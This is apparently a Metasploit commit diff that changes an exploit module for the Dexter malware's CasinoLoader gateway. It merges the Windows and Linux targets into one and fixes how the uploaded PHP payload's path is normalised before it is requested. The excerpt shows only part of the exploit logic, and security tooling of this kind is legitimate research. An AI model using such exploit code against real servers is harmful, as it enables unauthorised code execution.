Land rapid7#3011, @wchen-r7's fix for Dexter exploit

jvazquez-r7 · jvazquez-r7 · commit c981bbeab9ea · 2014-02-24T10:53:10.000-06:00
diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb
@@ -41,10 +41,10 @@ def initialize(info={})
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          ['CasinoLoader gateway.php on Windows', {}],
-          ['CasinoLoader gateway.php on Linux',   {}]
+          ['CasinoLoader gateway.php', {}]
         ],
       'Privileged'     => false,
+      'DefaultTarget'  => 0,
       'DisclosureDate' => "Feb 08 2014"
     ))
 
@@ -157,9 +157,7 @@ def exploit
 
     if res and res.code == 200 and res.body =~ /a href="upload.php\?del=(.*)">/
       path = $1
-      if target.name =~ /Linux/
-        path = path.sub! "\\", "/"
-      end
+      path = path.sub! "\\", "/"
       target_path = normalize_uri(target_uri.path, path)
       print_status("#{peer} - Requesting: #{target_path}")
       send_request_raw({'uri' => normalize_uri(target_path)})
